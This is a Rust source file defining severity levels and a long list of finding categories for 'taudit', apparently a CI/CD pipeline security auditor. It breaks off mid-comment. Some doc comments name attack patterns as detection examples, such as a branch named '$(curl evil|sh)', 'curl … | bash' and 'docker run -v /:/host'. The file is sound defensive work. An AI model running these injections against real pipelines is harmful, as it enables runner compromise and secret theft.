taudit_api/
lib.rs

1//! # taudit-api — stable wire types for JSON / SARIF / CloudEvents
2//!
3//! This crate owns every Rust type that appears in taudit's emitted
4//! output (JSON `taudit-report.schema.json`, JSON `authority-graph.v1.json`,
5//! SARIF `result.message.text` and `result.ruleId`, CloudEvents
6//! `tauditruleid` / `tauditfindingfingerprint` extension attributes).
7//!
8//! ## Stability promise (0.x)
9//!
10//! While at `0.x`:
11//! - Additive changes (new variants, new fields) MAY ship in any minor
12//!   bump. Consumers should pin a minor (`taudit-api = "0.1"`) and
13//!   review on each upgrade.
14//! - Breaking changes (renamed fields, removed variants, changed serde
15//!   representations) trigger a `0.{N+1}` minor bump and a CHANGELOG
16//!   migration note.
17//!
//! At `1.0`, the promise tightens: only `2.0` permits breaking changes; all
//! `1.x` minor bumps are additive.
20//!
21//! ## Use in downstream tooling
22//!
23//! Downstream consumers (tsign, axiom, custom SIEM integrations,
24//! Backstage plugins) should depend on `taudit-api` directly rather than
25//! `taudit-core`. `taudit-core` is workspace-internal and may break
26//! between minors; `taudit-api` is the public contract.
27//!
28//! See ADR 0001 (graph as product) and ADR 0004 (prereleases publish to
29//! crates.io).
30
31#![deny(missing_docs)]
32
33use serde::{Deserialize, Serialize, Serializer};
34use std::collections::{BTreeMap, HashMap};
35use std::path::PathBuf;
36
37// ── Severity ─────────────────────────────────────────────────────
38
/// Severity of a finding.
///
/// Serialized in `snake_case` (`critical`, `high`, `medium`, `low`, `info`).
///
/// Ordering is defined by the private `rank()` helper rather than derived:
/// `Critical` compares as the *smallest* value and `Info` as the largest, so
/// an ascending sort lists the most severe findings first.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum Severity {
    /// Highest — exploitable now, full authority leak.
    Critical,
    /// Significant exposure that needs prompt action.
    High,
    /// Notable but bounded risk.
    Medium,
    /// Low priority / hygiene.
    Low,
    /// Informational — no direct exposure, surfaces context for triage.
    Info,
}
54
55impl Severity {
56    fn rank(self) -> u8 {
57        match self {
58            Severity::Critical => 0,
59            Severity::High => 1,
60            Severity::Medium => 2,
61            Severity::Low => 3,
62            Severity::Info => 4,
63        }
64    }
65}
66
67impl Ord for Severity {
68    fn cmp(&self, other: &Self) -> std::cmp::Ordering {
69        self.rank().cmp(&other.rank())
70    }
71}
72
73impl PartialOrd for Severity {
74    fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
75        Some(self.cmp(other))
76    }
77}
78
79/// Move severity one rank toward `Info` (Critical -> High -> ... -> Info).
80/// `Info` stays `Info`. Used by both the suppression applicator and
81/// compensating-control detectors.
82///
83/// **API stability:** marked `#[doc(hidden)]` because this helper is a
84/// taudit-internal detail; downstream consumers should read `severity`
85/// directly from the JSON / SARIF / CloudEvents output.
86#[doc(hidden)]
87pub fn downgrade_severity(s: Severity) -> Severity {
88    match s {
89        Severity::Critical => Severity::High,
90        Severity::High => Severity::Medium,
91        Severity::Medium => Severity::Low,
92        Severity::Low => Severity::Info,
93        Severity::Info => Severity::Info,
94    }
95}
96
97// ── FindingCategory ──────────────────────────────────────────────
98
99/// MVP categories (1-5) are derivable from pipeline YAML alone.
100/// Stretch categories (6-9) need heuristics or metadata enrichment.
101#[allow(missing_docs)]
102#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
103#[serde(rename_all = "snake_case")]
104pub enum FindingCategory {
105    // MVP
106    AuthorityPropagation,
107    OverPrivilegedIdentity,
108    UnpinnedAction,
109    UntrustedWithAuthority,
110    ArtifactBoundaryCrossing,
111    // Stretch — implemented
112    FloatingImage,
113    LongLivedCredential,
114    /// Credential written to disk by a step (e.g. `persistCredentials: true` on a checkout).
115    /// Disk-persisted credentials are accessible to all subsequent steps and any process
116    /// with filesystem access, unlike runtime-only `HasAccessTo` authority.
117    PersistedCredential,
118    /// Dangerous trigger type (pull_request_target / pr) combined with secret/identity access.
119    TriggerContextMismatch,
120    /// Authority (secret/identity) flows into an opaque external workflow via DelegatesTo.
121    CrossWorkflowAuthorityChain,
122    /// Circular DelegatesTo chain — workflow calls itself transitively.
123    AuthorityCycle,
124    /// Privileged workflow (OIDC/broad identity) with no provenance attestation step.
125    UpliftWithoutAttestation,
126    /// Step writes to the environment gate ($GITHUB_ENV, pipeline variables) — authority can propagate.
127    SelfMutatingPipeline,
128    /// PR-triggered pipeline checks out the repository — attacker-controlled fork code lands on the runner.
129    CheckoutSelfPrExposure,
130    /// ADO variable group consumed by a PR-triggered job, crossing trust boundary.
131    VariableGroupInPrJob,
132    /// Self-hosted agent pool used in a PR-triggered job that also checks out the repository.
133    SelfHostedPoolPrHijack,
134    /// ADO self-hosted pool without workspace isolation (`clean: true`/`all`).
135    /// Shared self-hosted agents retain their workspace across pipeline runs.
136    /// Without `workspace: { clean: all }`, a PR build can deposit malicious
137    /// files that persist for the next (possibly privileged) pipeline run,
138    /// enabling workspace poisoning attacks.
139    SharedSelfHostedPoolNoIsolation,
140    /// Broad-scope ADO service connection reachable from a PR-triggered job without OIDC.
141    ServiceConnectionScopeMismatch,
142    /// ADO `resources.repositories[]` entry referenced by an `extends:`,
143    /// `template: x@alias`, or `checkout: alias` consumer resolves with no
144    /// `ref:` (default branch) or a mutable branch ref (`refs/heads/<name>`).
145    /// Whoever owns that branch can inject steps into the consuming pipeline.
146    TemplateExtendsUnpinnedBranch,
147    /// ADO `resources.repositories[]` entry pinned to a feature-class branch
148    /// (anything outside the `main` / `master` / `release/*` / `hotfix/*`
149    /// platform set). Feature branches typically have weaker push protection
150    /// than the trunk, so any developer with write access to that branch can
151    /// inject pipeline YAML that runs with the consumer's authority. Strictly
152    /// stronger signal than `template_extends_unpinned_branch` — co-fires.
153    TemplateRepoRefIsFeatureBranch,
154    /// Pipeline step uses an Azure VM remote-exec primitive (Set-AzVMExtension /
155    /// CustomScriptExtension, Invoke-AzVMRunCommand, az vm run-command, az vm extension set)
156    /// where the executed command line interpolates a pipeline secret or a SAS token —
157    /// pipeline-to-VM lateral movement primitive logged in plaintext to the VM and ARM.
158    VmRemoteExecViaPipelineSecret,
159    /// A SAS token freshly minted in-pipeline is interpolated into a CLI argument
160    /// (commandToExecute / scriptArguments / --arguments / -ArgumentList) instead of
161    /// passed via env var or stdin — argv ends up in /proc/*/cmdline, ETW, ARM status.
162    ShortLivedSasInCommandLine,
163    /// Pipeline secret value assigned to a shell variable inside an inline
164    /// script (`export VAR=$(SECRET)`, `$X = "$(SECRET)"`). Once the value
165    /// transits a shell variable, ADO's `$(SECRET)` log mask no longer
166    /// applies — transcripts (`Start-Transcript`, `bash -x`, terraform debug
167    /// logs) print the cleartext.
168    SecretToInlineScriptEnvExport,
169    /// Pipeline secret value written to a file under the agent workspace
170    /// (`$(System.DefaultWorkingDirectory)`, `$(Build.SourcesDirectory)`,
171    /// or relative paths) without `secureFile` task or chmod 600. The file
172    /// persists in the agent workspace and is uploaded by
173    /// `PublishPipelineArtifact` and crawlable by later steps.
174    SecretMaterialisedToWorkspaceFile,
175    /// PowerShell pulls a Key Vault secret with `-AsPlainText` (or
176    /// `ConvertFrom-SecureString -AsPlainText`, or older
177    /// `.SecretValueText` syntax) into a non-`SecureString` variable. The
178    /// value never traverses the ADO variable-group boundary, so verbose
179    /// Az/PS logging and error stack traces print the credential.
180    ///
181    /// Rule id is `keyvault_secret_to_plaintext` (single token "keyvault")
182    /// rather than the snake_case derivation `key_vault_…` — matches the
183    /// docs filename and the convention used in the corpus evidence.
184    #[serde(rename = "keyvault_secret_to_plaintext")]
185    KeyVaultSecretToPlaintext,
186    /// `terraform apply -auto-approve` against a production-named service connection
187    /// without an environment approval gate.
188    TerraformAutoApproveInProd,
189    /// `AzureCLI@2` task with `addSpnToEnvironment: true` AND an inline script —
190    /// the script can launder federated SPN/OIDC tokens into pipeline variables.
191    AddSpnWithInlineScript,
192    /// A `type: string` pipeline parameter (no `values:` allowlist) is interpolated
193    /// via `${{ parameters.X }}` into an inline shell/PowerShell script body —
194    /// shell injection vector for anyone with "queue build".
195    ParameterInterpolationIntoShell,
196    /// A `run:` block fetches a remote script from a mutable URL (`refs/heads/`,
197    /// `/main/`, `/master/`) and pipes it directly to a shell interpreter
198    /// (`curl … | bash`, `wget … | sh`, `bash <(curl …)`, `deno run https://…`).
199    /// Whoever controls that URL's content controls execution on the runner.
200    RuntimeScriptFetchedFromFloatingUrl,
201    /// Workflow trigger combines high-authority PR events
202    /// (`pull_request_target`, `issue_comment`, or `workflow_run`) with a step
203    /// whose `uses:` ref is a mutable branch/tag (not a 40-char SHA). Compromise
204    /// of the action's default branch yields full repo write on the target repo.
205    PrTriggerWithFloatingActionRef,
206    /// A `workflow_run`-triggered workflow captures a value from an external
207    /// API response (`gh pr view`, `gh api`, `curl api.github.com`) and writes
208    /// it into `$GITHUB_ENV`/`$GITHUB_OUTPUT`/`$GITHUB_PATH` without sanitisation.
209    /// A poisoned API field (branch name, title) injects environment variables
210    /// into every subsequent step in the same job.
211    UntrustedApiResponseToEnvSink,
212    /// A `pull_request`-triggered workflow logs into a container registry via a
213    /// floating (non-SHA-pinned) login action. The compromised action receives
214    /// OIDC tokens or registry credentials, and the workflow then pushes a
215    /// PR-controlled image to a shared registry.
216    PrBuildPushesImageWithFloatingCredentials,
217    /// First-party step writes a Secret/Identity-derived value into the
218    /// `$GITHUB_ENV` gate (or pipeline-variable equivalent) and a *later*
219    /// step in the same job that runs in `Untrusted` or `ThirdParty` trust
220    /// zone reads from the runner-managed env (`${{ env.X }}`). The two
221    /// component rules — `self_mutating_pipeline` (writer) and
222    /// `untrusted_with_authority` (consumer) — each see only half the
223    /// chain and emit no finding for the laundered consumer; this rule
224    /// closes the composition gap that R2 attack #3 exploited.
225    SecretViaEnvGateToUntrustedConsumer,
226    /// Positive-invariant rule (GHA): the workflow declares neither a
227    /// top-level nor a per-job `permissions:` block, leaving GITHUB_TOKEN at
228    /// its broad platform default. Fires once per workflow file.
229    NoWorkflowLevelPermissionsBlock,
230    /// Positive-invariant rule (ADO): a job referencing a production-named
231    /// service connection has no `environment:` binding, so it bypasses the
232    /// only ADO-side approval gate regardless of whether `-auto-approve` is
233    /// present. Strictly broader than `terraform_auto_approve_in_prod`.
234    ProdDeployJobNoEnvironmentGate,
235    /// Positive-invariant rule (cross-platform): a long-lived static
236    /// credential is in scope but the workflow does not currently use any
237    /// OIDC identity even though the target cloud supports federation.
238    /// Advisory uplift on top of `long_lived_credential` that wires the
239    /// existing `Recommendation::FederateIdentity` variant.
240    LongLivedSecretWithoutOidcRecommendation,
241    /// Positive-invariant rule (GHA): a PR-triggered workflow has multiple
242    /// privileged jobs where SOME have the standard fork-check `if:` and
243    /// OTHERS do not. Detects an intra-file inconsistency in defensive
244    /// posture — the org has the right instinct but applied it unevenly.
245    PullRequestWorkflowInconsistentForkCheck,
246    /// Positive-invariant rule (GitLab): a job with a production-named
247    /// `environment:` binding has no `rules:` / `only:` clause restricting
248    /// it to protected branches. Deploy job runs (or attempts to run) on
249    /// every pipeline trigger.
250    GitlabDeployJobMissingProtectedBranchOnly,
251    /// Two-step ADO chain: an inline script captures a `terraform output`
252    /// value (literal `terraform output` CLI invocation or a `$env:TF_OUT_*` /
253    /// `$TF_OUT_*` env var sourced from a Terraform CLI task) AND emits a
254    /// `##vso[task.setvariable variable=X;...]` directive setting that
255    /// captured value into pipeline variable `X`. A subsequent step in the
256    /// same job then expands `$(X)` in shell-expansion position
257    /// (`bash -c "..."`, `eval`, command substitution `$(...)`, PowerShell
258    /// `-split` / `Invoke-Command` / `Invoke-Expression`/`iex`, or as an
259    /// unquoted command word). The `task.setvariable` hop launders
260    /// attacker-controlled Terraform state — sourced from a remote backend
261    /// (S3 bucket, Azure Storage) that often has weaker access controls than
262    /// the pipeline itself — through pipeline-variable space and into a
263    /// shell interpreter.
264    TerraformOutputViaSetvariableShellExpansion,
265    /// GHA workflow declares a high-blast-radius trigger (`issue_comment`,
266    /// `pull_request_review`, `pull_request_review_comment`, `workflow_run`)
267    /// alongside write permissions or non-`GITHUB_TOKEN` secrets. Closes the
268    /// gap left by `trigger_context_mismatch` only firing on
269    /// `pull_request_target` / ADO `pr`.
270    RiskyTriggerWithAuthority,
271    /// A `jobs.<id>.outputs.<name>` value is sourced from `secrets.*`, an
272    /// OIDC-bearing step output, or has a credential-shaped name. Job outputs
273    /// flow unmasked through `needs.<job>.outputs.*` and are written to the
274    /// run log — masking is heuristic, never authoritative.
275    SensitiveValueInJobOutput,
276    /// A `workflow_dispatch.inputs.*` value flows into `curl` / `wget` /
277    /// `gh api` / a `run:` URL / `actions/checkout` `ref:`. Anyone with
278    /// dispatch permission can pivot the run to attacker-controlled refs or
279    /// hosts.
280    ManualDispatchInputToUrlOrCommand,
281    /// A reusable workflow call uses `secrets: inherit` while the caller is
282    /// triggered by an attacker-influenced event (`pull_request`,
283    /// `pull_request_target`, `issue_comment`, `workflow_run`). The whole
284    /// caller secret bag forwards to the callee regardless of what the callee
285    /// actually consumes — every transitive `uses:` in the called workflow
286    /// inherits the same scope.
287    SecretsInheritOverscopedPassthrough,
288    /// A `workflow_run`- or `pull_request_target`-triggered consumer
289    /// downloads an artifact from the originating run AND interprets that
290    /// artifact's content into a privileged sink (post-to-comment, write to
291    /// `$GITHUB_ENV`, `eval`, …). The producer ran in PR context, so a
292    /// malicious PR can write arbitrary content into the artifact while the
293    /// consumer holds upstream-repo authority.
294    UnsafePrArtifactInWorkflowRunConsumer,
295    /// A GitHub Actions `run:` block (or `actions/github-script` `script:` body)
296    /// interpolates an attacker-controllable expression — `${{ github.event.* }}`,
297    /// `${{ github.head_ref }}`, or `${{ inputs.* }}` from a privileged trigger
298    /// (`workflow_dispatch` / `workflow_run` / `issue_comment`) — directly into
299    /// the script text without first binding through an `env:` indirection.
300    /// Classic GitHub Actions remote-code-execution pattern.
301    ScriptInjectionViaUntrustedContext,
302    /// A workflow that holds non-`GITHUB_TOKEN` secrets or non-default
303    /// write permissions includes a step that uses an interactive debug action
304    /// (mxschmitt/action-tmate, lhotari/action-upterm, actions/tmate, …).
305    /// A maintainer flipping `debug_enabled=true` publishes the runner's full
306    /// environment over an external SSH endpoint.
307    InteractiveDebugActionInAuthorityWorkflow,
308    /// An `actions/cache` step keys the cache on a PR-derived expression
309    /// (`github.head_ref`, `github.event.pull_request.head.ref`, `github.actor`)
310    /// in a workflow that ALSO runs on `push: branches: [main]` — a PR can
311    /// poison the cache that the default-branch build later restores.
312    PrSpecificCacheKeyInDefaultBranchConsumer,
313    /// A `run:` step uses `gh ` / `gh api` with the default `GITHUB_TOKEN` to
314    /// perform a write-class action (`pr merge`, `release create/upload`,
315    /// `api -X POST/PATCH/PUT/DELETE` to `/repos/.../{contents,releases,actions/secrets,environments}`)
316    /// inside a workflow triggered by `pull_request`, `issue_comment`, or
317    /// `workflow_run` — runtime privilege escalation that static permission
318    /// checks miss.
319    GhCliWithDefaultTokenEscalating,
320    /// Attacker-controlled GitHub context is interpolated directly into a
321    /// privileged shell/script step that holds secrets, OIDC, or write token.
322    GhaScriptInjectionToPrivilegedShell,
323    /// Workflow-run or pull-request-target consumer downloads a PR artifact,
324    /// interprets it, and holds write-token or non-default authority.
325    GhaWorkflowRunArtifactPoisoningToPrivilegedConsumer,
326    /// Mutable remote script execution happens inside a job with secrets,
327    /// OIDC, cloud, registry, package, signing, or write-token authority.
328    GhaRemoteScriptInAuthorityJob,
329    /// A GitHub Actions shell step embeds a PAT/token in a git remote URL and
330    /// performs a write-capable git operation.
331    GhaPatRemoteUrlWrite,
332    /// An issue-comment workflow turns comment body or issue metadata into a
333    /// command path while write-token authority is present.
334    GhaIssueCommentCommandToWriteToken,
335    /// PR-triggered workflow builds and pushes a container image while registry
336    /// or cloud publish authority is present.
337    GhaPrBuildPushesPublishableImage,
338    /// workflow_dispatch input selects the checkout ref in a workflow with
339    /// write-token, secret, or deploy authority.
340    GhaManualDispatchRefToPrivilegedCheckout,
341    /// GitLab CI `$CI_JOB_TOKEN` (or `gitlab-ci-token:$CI_JOB_TOKEN`) used as a
342    /// bearer credential against an external HTTP API or fed to `docker login`
343    /// for `registry.gitlab.com`. CI_JOB_TOKEN's default scope (registry write,
344    /// package upload, project read) means a poisoned MR job that emits the
345    /// token to a webhook can pivot to package/registry pushes elsewhere.
346    CiJobTokenToExternalApi,
347    /// GitLab CI `id_tokens:` declares an `aud:` audience that is reused across
348    /// MR-context and protected-context jobs (no audience separation), or is a
349    /// wildcard / multi-cloud broker URL. The audience is what trades for
350    /// downstream cloud creds — a single shared `aud` means any job that
351    /// compromises the token assumes the most-privileged role any other job
352    /// uses.
353    IdTokenAudienceOverscoped,
354    /// Direct shell interpolation of attacker-controlled GitLab predefined
355    /// vars (`$CI_COMMIT_BRANCH`, `$CI_COMMIT_REF_NAME`, `$CI_COMMIT_TAG`,
356    /// `$CI_COMMIT_MESSAGE`, `$CI_COMMIT_TITLE`, `$CI_MERGE_REQUEST_TITLE`,
357    /// `$CI_MERGE_REQUEST_DESCRIPTION`,
358    /// `$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`, `$CI_COMMIT_AUTHOR`) into
359    /// `script:` / `before_script:` / `after_script:` / `environment:url:`
360    /// without single-quote isolation. A branch named `` $(curl evil|sh) ``
361    /// executes inside the runner. GitLab generalisation of the GHA
362    /// `script_injection_via_untrusted_context` class.
363    UntrustedCiVarInShellInterpolation,
364    /// A GitLab `include:` references (a) a `remote:` URL pointing at a
365    /// branch (`/-/raw/<branch>/...`), (b) a `project:` with `ref:` resolving
366    /// to a mutable branch name (main/master/develop), or (c) an include with
367    /// no `ref:` at all (defaults to HEAD). Whoever owns that branch can
368    /// backdoor every consumer's pipeline silently — included YAML executes
369    /// with the consumer's secrets and CI_JOB_TOKEN.
370    UnpinnedIncludeRemoteOrBranchRef,
371    /// A GitLab job declares a `services: [docker:*-dind]` sidecar AND holds
372    /// at least one non-CI_JOB_TOKEN secret (registry creds, deploy keys,
373    /// signing keys, vault id_tokens). docker-in-docker exposes the full
374    /// Docker socket inside the job container — a malicious build step can
375    /// `docker run -v /:/host` from inside dind and read the runner host
376    /// filesystem (other jobs' artifacts, cached creds).
377    DindServiceGrantsHostAuthority,
378    /// A GitLab job whose name or `extends:` matches scanner patterns
379    /// (`sast`, `dast`, `secret_detection`, `dependency_scanning`,
380    /// `container_scanning`, `gitleaks`, `trivy`, `grype`, `semgrep`, etc.)
381    /// runs with `allow_failure: true` AND has no `rules:` clause that
382    /// surfaces the failure. The pipeline goes green even when the scan
383    /// errors out — silent-pass is worse than no scan because reviewers trust
384    /// the badge.
385    SecurityJobSilentlySkipped,
386    /// A GitLab `trigger:` job (downstream / child pipeline) runs in
387    /// `merge_request_event` context OR uses `include: artifact:` from a
388    /// previous job (dynamic child pipeline). Dynamic child pipelines are a
389    /// code-injection sink — anything the build step writes to the artifact
390    /// runs as a real pipeline with the parent project's secrets.
391    ChildPipelineTriggerInheritsAuthority,
392    /// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
393    /// only, or `$CI_COMMIT_REF_SLUG` without a `policy: pull` restriction.
394    /// Caches are stored per-runner keyed by `key:`; a poisoned MR can push a
395    /// malicious `node_modules/` cache that the next default-branch job
396    /// downloads and executes during `npm install`.
397    CacheKeyCrossesTrustBoundary,
398    /// A CI script constructs an HTTPS git URL with embedded credentials
399    /// (`https://user:$TOKEN@host/...`) before invoking `git clone`,
400    /// `git push`, or `git remote set-url`. The credential is exposed
401    /// in the process argv (visible to `ps`, `/proc/*/cmdline`), persists
402    /// in `.git/config` for the rest of the job, and may be uploaded as
403    /// part of any artifact that bundles the workspace.
404    PatEmbeddedInGitRemoteUrl,
405    /// A CI job triggers a different project's pipeline via the GitLab
406    /// REST API using `CI_JOB_TOKEN` and forwards user-influenced variables
407    /// through the `variables[KEY]=value` query/form parameter. The
408    /// downstream project's security depends on the trust contract between
409    /// the two projects — variable values flowing across that boundary
410    /// constitute a cross-project authority bridge.
411    CiTokenTriggersDownstreamWithVariablePassthrough,
412    /// A GitLab job emits an `artifacts.reports.dotenv: <file>` artifact
413    /// whose contents become pipeline variables for any consumer linked
414    /// via `needs:` or `dependencies:`. A consumer in a later stage that
415    /// targets a production-named environment inherits those variables
416    /// transparently — no explicit download is visible at the job level.
417    /// When the producer reads attacker-influenced inputs (branch names,
418    /// commit messages), the dotenv flow is a covert privilege escalation
419    /// channel into the deployment job.
420    DotenvArtifactFlowsToPrivilegedDeployment,
421    /// ADO inline script sets a sensitive-named pipeline variable via
422    /// `##vso[task.setvariable variable=<NAME>]` with `issecret=false` or
423    /// without the `issecret` flag at all. Without `issecret=true` the
424    /// variable value is printed in plaintext to the pipeline log and is
425    /// not masked in downstream step output.
426    SetvariableIssecretFalse,
427    /// A GHA `uses:` action reference contains a non-ASCII character —
428    /// possible Unicode confusable / homoglyph impersonating a trusted
429    /// action (e.g. Cyrillic `a` instead of Latin `a`, or U+2215
430    /// DIVISION SLASH instead of U+002F SOLIDUS).
431    HomoglyphInActionRef,
432    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
433    /// helper-delegating action passes sensitive material to a bare helper via
434    /// command-line arguments. The prior step can select the helper that
435    /// receives later action-only authority.
436    GhaHelperPathSensitiveArgv,
437    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
438    /// helper-delegating action passes sensitive material to a bare helper over
439    /// stdin, such as Docker login passwords or Wrangler secret payloads.
440    GhaHelperPathSensitiveStdin,
441    /// A GitHub Actions step mutates `GITHUB_PATH` before a later known
442    /// helper-delegating action runs a bare helper with sensitive environment
443    /// values in scope.
444    GhaHelperPathSensitiveEnv,
445    /// A GitHub Actions post action recomputes cleanup targets from ambient
446    /// environment rather than an action-owned state channel, allowing later
447    /// `GITHUB_ENV` writes to retarget cleanup.
448    GhaPostAmbientEnvCleanupPath,
449    /// A GitHub Actions action mints or exchanges later credentials and then
450    /// delegates them to a PATH-resolved helper.
451    GhaActionMintedSecretToHelper,
452    /// A GitHub Actions action invokes a security-sensitive helper by bare
453    /// name after an earlier same-job `GITHUB_PATH` mutation.
454    GhaHelperUntrustedPathResolution,
455    /// A GitHub Actions login action exposes credential material as step
456    /// outputs after helper login, making cross-job propagation easy to miss.
457    GhaSecretOutputAfterHelperLogin,
458    /// Umbrella GHA authority-confusion classifier: an earlier same-job
459    /// `GITHUB_PATH` mutation precedes a later helper action that receives or
460    /// mints sensitive authority.
461    LaterSecretMaterializedAfterPathMutation,
462    /// `actions/setup-node` cache mode resolves npm/pnpm/yarn helpers after an
463    /// earlier same-job `GITHUB_PATH` mutation.
464    GhaSetupNodeCacheHelperPathHandoff,
465    /// `actions/setup-python` cache mode resolves pip/pipenv/poetry helpers
466    /// after an earlier same-job `GITHUB_PATH` mutation.
467    GhaSetupPythonCacheHelperPathHandoff,
468    /// `actions/setup-python` pip-install mode runs pip while inheriting
469    /// ambient credentials or cloud authority.
470    GhaSetupPythonPipInstallAuthorityEnv,
471    /// `actions/setup-go` cache mode resolves Go helpers after an earlier
472    /// same-job `GITHUB_PATH` mutation.
473    GhaSetupGoCacheHelperPathHandoff,
474    /// `docker/setup-qemu-action` invokes Docker/QEMU helper flow in a job that
475    /// already has registry authority or private-image context.
476    GhaDockerSetupQemuPrivilegedDockerHelper,
477    /// Tool-installer action is followed by shell use of the installed helper
478    /// while deploy/signing authority is in scope.
479    GhaToolInstallerThenShellHelperAuthority,
480    /// Shell command sequence concentrates publish, deploy, signing, registry,
481    /// or release authority in a workflow step.
482    GhaWorkflowShellAuthorityConcentration,
483    /// A token-bearing action boundary invokes bare download or verification
484    /// helpers after an earlier same-job `GITHUB_PATH` mutation.
485    GhaActionTokenEnvBeforeBareDownloadHelper,
486    /// A post action can retarget cache-save cleanup from ambient action input
487    /// or environment state after a later same-job mutation.
488    GhaPostActionInputRetargetToCacheSave,
489    /// `hashicorp/setup-terraform` wrapper outputs are consumed by a later
490    /// step, potentially moving sensitive Terraform stdout/stderr material.
491    GhaTerraformWrapperSensitiveOutput,
492    /// A workflow or composite-style shell step invokes a bare helper after
493    /// mutable PATH setup while secret environment authority is in scope.
494    GhaCompositeBareHelperAfterPathInstallWithSecretEnv,
495    /// Pulumi action/CLI authority is delegated to a PATH-resolved `pulumi`
496    /// helper after an earlier same-job `GITHUB_PATH` mutation.
497    GhaPulumiPathResolvedCliWithAuthority,
498    /// PyPI publish authority or OIDC publishing capability reaches PyPI
499    /// helper resolution after an earlier same-job `GITHUB_PATH` mutation.
500    GhaPypiPublishOidcAfterPathMutation,
501    /// Changesets publish authority reaches package-manager helper resolution
502    /// after an earlier same-job `GITHUB_PATH` mutation.
503    GhaChangesetsPublishCommandWithAuthority,
504    /// RubyGems release token or OIDC authority reaches gem/bundle/git helper
505    /// resolution after an earlier same-job `GITHUB_PATH` mutation.
506    GhaRubygemsReleaseGitTokenAndOidcHelper,
507    /// A local/composite action entrypoint can be path-shadowed before it runs
508    /// with secret environment authority.
509    GhaCompositeEntrypointPathShadowWithSecretEnv,
510    /// Docker Buildx setup/build-push authority reaches Docker/buildx helpers
511    /// after an earlier same-job `GITHUB_PATH` mutation.
512    GhaDockerBuildxAuthorityPathHandoff,
513    /// Google deploy actions receive generated Google/cloud authority before
514    /// delegating to `gcloud` after mutable PATH setup.
515    GhaGoogleDeployGcloudCredentialPath,
516    /// Datadog test visibility setup runs installer/helper flow with API key
517    /// authority after mutable PATH setup.
518    GhaDatadogTestVisibilityInstallerAuthority,
519    /// Kubernetes or Helm helper commands run with kubeconfig/deploy authority
520    /// after mutable PATH setup.
521    GhaKubernetesHelperKubeconfigAuthority,
522    /// Azure companion helpers such as sqlcmd, SqlPackage, kubelogin, or pwsh
523    /// run with Azure login authority after mutable PATH setup.
524    GhaAzureCompanionHelperAuthority,
525    /// `peter-evans/create-pull-request` receives PR token authority after an
526    /// earlier same-job `GITHUB_PATH` mutation and delegates to `git`.
527    GhaCreatePrGitTokenPathHandoff,
528    /// `crazy-max/ghaction-import-gpg` receives GPG private key/passphrase
529    /// material after an earlier same-job `GITHUB_PATH` mutation.
530    GhaImportGpgPrivateKeyHelperPath,
531    /// `webfactory/ssh-agent` receives SSH private key material after an
532    /// earlier same-job `GITHUB_PATH` mutation.
533    GhaSshAgentPrivateKeyToPathHelper,
534    /// `apple-actions/import-codesign-certs` receives macOS P12/keychain
535    /// material after an earlier same-job `GITHUB_PATH` mutation.
536    GhaMacosCodesignCertSecurityPath,
537    /// Pages deploy actions compose token/deploy-key Git authority after an
538    /// earlier same-job `GITHUB_PATH` mutation.
539    GhaPagesDeployTokenUrlToGitHelper,
540    /// A `workflow_run` / `pull_request_target` consumer downloads a
541    /// PR-context artifact, then uses artifact-derived PR metadata near a
542    /// write-class GitHub API/comment sink.
543    GhaWorkflowRunArtifactMetadataToPrivilegedApi,
544    /// A `workflow_run` / `pull_request_target` consumer downloads a
545    /// PR-context artifact, reads report content, and posts it to a PR or
546    /// review comment sink.
547    GhaWorkflowRunArtifactReportToPrComment,
548    /// A `workflow_run` / `pull_request_target` consumer downloads a
549    /// PR-context artifact and feeds artifact-derived data into a build-scan
550    /// or Develocity publication path.
551    GhaWorkflowRunArtifactToBuildScanPublish,
552    /// A mutable remote script is executed before a publish/deploy/release
553    /// sink in the same authority-bearing GitHub Actions job.
554    GhaFloatingRemoteScriptBeforePublishSink,
555    /// A token-bearing Git remote URL is used while trace/debug/process
556    /// exposure is enabled, making the token observable through argv, logs, or
557    /// process inspection.
558    GhaTokenRemoteUrlWithTraceOrProcessExposure,
559    /// Earlier same-job env state redirects a credential helper's config file
560    /// before later cloud, registry, package, or signing authority is present.
561    GhaEnvCredentialHelperConfigRedirectBeforeAuthority,
562    /// Earlier same-job `NODE_OPTIONS` startup injection reaches a later
563    /// Node/npm/npx/yarn authority boundary.
564    GhaEnvNodeOptionsCodeInjectionBeforeNodeAuthority,
565    /// Earlier same-job dynamic-loader env state reaches a later
566    /// credential-bearing helper boundary.
567    GhaEnvDyldOrLdLibraryPathBeforeCredentialHelper,
568    /// A reusable workflow accepts caller-controlled container image input
569    /// while secrets are inherited across the caller/callee boundary.
570    GhaWorkflowCallContainerImageInputSecretsInherit,
571    /// A reusable workflow accepts caller-controlled runner labels while
572    /// secrets, OIDC, or write-token authority is available.
573    GhaWorkflowCallRunnerLabelInputPrivilegeEscalation,
574    /// A job runs in an attacker-influenced container image while secret or
575    /// token authority is present in that job.
576    GhaContainerImageAttackerInfluencedWithSecretEnv,
577    /// Attestation action signs a caller/step-provided subject digest rather
578    /// than a digest it independently computed from a workspace file.
579    GhaAttestationSubjectDigestFromStepOutputUnverified,
580    /// PR-reachable workflow signs files selected by a workspace glob.
581    GhaAttestationSubjectPathWorkspaceGlobWithPrTrigger,
582    /// Attestation reachability is gated by a workspace/config-derived output.
583    GhaAttestationConfigDrivenGateFromWorkspaceFile,
584    /// PR, issue, or comment text is sent to an external telemetry sink.
585    GhaTelemetryPrOrIssueTextToExternalSink,
586    /// Debug logging is enabled while secret-bearing environment is present.
587    GhaTelemetryDebugFlagWithSecretEnv,
588    /// Autonomous coding agent receives untrusted event text while mutation
589    /// authority is available.
590    GhaTelemetryAutonomousAgentInputFromUntrustedEvent,
591    /// Workflow-run artifact bytes are published to blob/object storage under
592    /// token authority.
593    GhaWorkflowRunArtifactToBlobStorageToken,
594    /// Workflow-run artifact or failure data reaches an autonomous agent before
595    /// a GitHub or git mutation step.
596    GhaApiWorkflowRunArtifactToAutonomousAgentToGitPush,
597    /// PR-reachable npm-family install runs manifest lifecycle hooks while
598    /// token, secret, OIDC, registry, cloud, or write authority is present.
599    GhaManifestNpmLifecycleHookPrTriggerWithToken,
600    /// PR-reachable Python build/install path executes project manifest code
